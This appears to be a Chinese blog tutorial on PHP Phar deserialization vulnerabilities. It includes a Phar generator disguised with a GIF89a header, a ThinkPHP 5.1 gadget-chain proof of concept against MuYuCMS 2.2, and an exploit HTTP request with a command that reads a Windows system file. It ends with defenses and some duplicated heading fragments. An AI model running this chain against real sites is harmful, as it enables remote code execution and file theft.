PHP Phar反序列化漏洞深入分析与利用<\/h1>

一、PHP反序列化漏洞概述<\/h2>

PHP反序列化漏洞按照反序列化入口可以分为三类：<\/p>

调用unserialize()<\/code>函数进行反序列化<\/li>
利用Session处理中进行的反序列化操作<\/li>

通过Phar伪协议进行反序列化<\/li>
<\/ol>
其中，unserialize()<\/code>函数的使用较少见，而Session反序列化可控条件较为苛刻。本文将重点介绍第三种方式——Phar伪协议反序列化漏洞。<\/p>
二、Phar基础知识<\/h2>
1. 什么是Phar<\/h3>
Phar(PHP Archive)是PHP的压缩文档格式，从PHP 5.3开始引入，类似于Java的JAR文件。它可以将多个文件打包到一个文件中，无需解压即可被PHP访问和执行内部语句。<\/p>
2. Phar文件结构<\/h3>
Phar文件包含以下几个主要部分：<\/p>

stub<\/strong>：文件头部标识，必须包含__HALT_COMPILER();?><\/code>，前面可以添加任意内容<\/li>
manifest<\/strong>：包含文件的元数据，其中自定义的meta-data会以序列化形式存储<\/li>
文件内容<\/strong>：实际存储的文件内容<\/li>
签名<\/strong>：可选部分，用于验证文件完整性<\/li>
<\/ul>
三、Phar反序列化原理<\/h2>
Phar之所以能触发反序列化，是因为：<\/p>

Phar文件会以序列化的形式存储用户自定义的meta-data<\/li>
PHP在解析meta数据时，会调用php_var_unserialize()<\/code>进行反序列化操作<\/li>
这相当于替代了unserialize()<\/code>函数作为反序列化漏洞的入口<\/li>
<\/ol>
四、触发Phar反序列化的文件系统函数<\/h2>
以下常见的PHP文件系统函数在参数可控时可触发Phar反序列化：<\/p>
file_exists()、is_dir()、is_executable()、is_file()、is_link()、is_readable()
is_writable()、is_writeable()、parse_ini_file()、copy()、unlink()、stat()
fopen()、file()、file_get_contents()、readfile()、md5_file()、sha1_file()
<\/code><\/pre>
五、生成Phar文件的技巧<\/h2>
1. 基本生成方法<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> TestObject<\/span> {}
<\/span><\/span>
<\/span><\/span>@<\/span>unlink<\/span>("phar.phar"<\/span>);
<\/span><\/span>$phar =<\/span> new<\/span> Phar<\/span>("phar.phar"<\/span>);
<\/span><\/span>$phar-><\/span>startBuffering<\/span>();
<\/span><\/span>$phar-><\/span>setStub<\/span>("GIF89a"<\/span>.<\/span> "<?php __HALT_COMPILER(); ?>"<\/span>); \/\/ 设置stub，增加gif文件头
<\/span><\/span><\/span><\/span>$o =<\/span> new<\/span> TestObject<\/span>();
<\/span><\/span>$phar-><\/span>setMetadata<\/span>($o); \/\/ 将自定义meta-data存入manifest
<\/span><\/span><\/span><\/span>$phar-><\/span>addFromString<\/span>("test.txt"<\/span>, "test"<\/span>); \/\/ 添加要压缩的文件
<\/span><\/span><\/span><\/span>$phar-><\/span>stopBuffering<\/span>();
<\/span><\/span><\/code><\/pre>2. 绕过上传限制的技巧<\/h3>
由于PHP识别Phar文件仅通过头部标识__HALT_COMPILER();?><\/code>，因此可以：<\/p>

添加任意文件头（如GIF89a）<\/li>
修改Phar文件后缀名（如.jpg、.png等）<\/li>
从而绕过上传点的文件类型检查<\/li>
<\/ol>
六、漏洞利用实战（以MuYuCMS 2.2为例）<\/h2>
1. 寻找触发点<\/h3>
目标：找到一个参数可控的受影响的文件系统函数。<\/p>
在MuYuCMS 2.2中，Template.php<\/code>文件的is_dir()<\/code>函数参数可控：<\/p>
\/\/ Template.php
<\/span><\/span><\/span><\/span>public<\/span> function<\/span> cutformadd<\/span>()
<\/span><\/span>{
<\/span><\/span>    $path =<\/span> input<\/span>('path'<\/span>);
<\/span><\/span>    if<\/span>(is_dir<\/span>($path)) {
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 构造利用链<\/h3>
MuYuCMS基于ThinkPHP 5.1开发，可以使用现成的反序列化利用链：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> think<\/span> {
<\/span><\/span>    abstract<\/span> class<\/span> Model<\/span> {
<\/span><\/span>        protected<\/span> $append =<\/span> [];
<\/span><\/span>        private<\/span> $data =<\/span> [];
<\/span><\/span>        function<\/span> __construct() {
<\/span><\/span>            $this-><\/span>append<\/span> =<\/span> ["l1_Tuer"<\/span>=><\/span>["123"<\/span>]];
<\/span><\/span>            $this-><\/span>data<\/span> =<\/span> ["l1_Tuer"<\/span>=><\/span> new<\/span> Request<\/span>()];
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\process\pipes<\/span> {
<\/span><\/span>    use<\/span> think\model\concern\Conversion<\/span>;
<\/span><\/span>    use<\/span> think\model\Pivot<\/span>;
<\/span><\/span>    class<\/span> Windows<\/span> {
<\/span><\/span>        private<\/span> $files =<\/span> [];
<\/span><\/span>        public<\/span> function<\/span> __construct() {
<\/span><\/span>            $this-><\/span>files<\/span>=<\/span>[new<\/span> Pivot<\/span>()];
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\model<\/span> {
<\/span><\/span>    use<\/span> think\Model<\/span>;
<\/span><\/span>    class<\/span> Pivot<\/span> extends<\/span> Model<\/span> {}
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> {
<\/span><\/span>    use<\/span> think\process\pipes\Windows<\/span>;
<\/span><\/span>    $phar =<\/span> new<\/span> Phar<\/span>("shell.phar"<\/span>);
<\/span><\/span>    $phar-><\/span>startBuffering<\/span>();
<\/span><\/span>    $phar-><\/span>setStub<\/span>("GIF89a"<\/span>.<\/span> "<?php __HALT_COMPILER(); ?>"<\/span>);
<\/span><\/span>    $o =<\/span> new<\/span> Windows<\/span>();
<\/span><\/span>    $phar-><\/span>setMetadata<\/span>($o);
<\/span><\/span>    $phar-><\/span>addFromString<\/span>("test.txt"<\/span>, "test"<\/span>);
<\/span><\/span>    $phar-><\/span>stopBuffering<\/span>();
<\/span><\/span>    echo<\/span> (base64_encode<\/span>(serialize<\/span>(new<\/span> Windows<\/span>())));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. 生成Phar文件<\/h3>

修改php.ini，设置phar.readonly = Off<\/code><\/li>
执行生成脚本：php.exe poc.php<\/code><\/li>
<\/ol>
4. 上传并触发漏洞<\/h3>

登录后台，找到任意图片上传点，上传伪装成图片的Phar文件<\/li>
记录返回的文件路径<\/li>
构造漏洞利用请求：<\/li>
<\/ol>
POST \/admin.php\/template\/cutformadd?cmd=type%20c:\\windows\\win.ini HTTP\/1.1
Host: target.com
Content-Type: application\/x-www-form-urlencoded
Cookie: PHPSESSID=xxx

finame=测试&fielname=gywm.html&path=phar:\/\/.\/public\/upload\/images\/恶意文件.jpg&content=666
<\/code><\/pre>
七、防御措施<\/h2>

禁用Phar流包装器：stream_wrapper_unregister('phar');<\/code><\/li>
对文件系统函数的参数进行严格过滤<\/li>
限制上传文件的类型，不仅检查扩展名，还要检查文件内容<\/li>
使用phar.require_hash=On<\/code>要求Phar文件必须包含签名<\/li>
及时更新框架和依赖库，避免使用已知存在漏洞的版本<\/li>
<\/ol>
八、总结<\/h2>
Phar反序列化漏洞是一种较为隐蔽的攻击方式，特点如下：<\/p>

不需要直接调用unserialize()<\/code>函数<\/li>
可以绕过上传限制<\/li>
利用常见的文件操作函数触发<\/li>
危害性大，可导致远程代码执行<\/li>
<\/ol>
在白盒审计时，应重点关注：<\/p>

参数可控的文件系统函数调用<\/li>
文件上传功能的实现方式<\/li>
项目中使用的第三方库和框架版本<\/li>
<\/ol>

PHP Phar反序列化漏洞深入分析与利用<\/h1>

1. 什么是Phar<\/h3> Phar(PHP Archive)是PHP的压缩文档格式，从PHP 5.3开始引入，类似于Java的JAR文件。它可以将多个文件打包到一个文件中，无需解压即可被PHP访问和执行内部语句。<\/p>

五、生成Phar文件的技巧<\/h2>

六、漏洞利用实战（以MuYuCMS 2.2为例）<\/h2>

1. 什么是Phar<\/h3>
Phar(PHP Archive)是PHP的压缩文档格式，从PHP 5.3开始引入，类似于Java的JAR文件。它可以将多个文件打包到一个文件中，无需解压即可被PHP访问和执行内部语句。<\/p>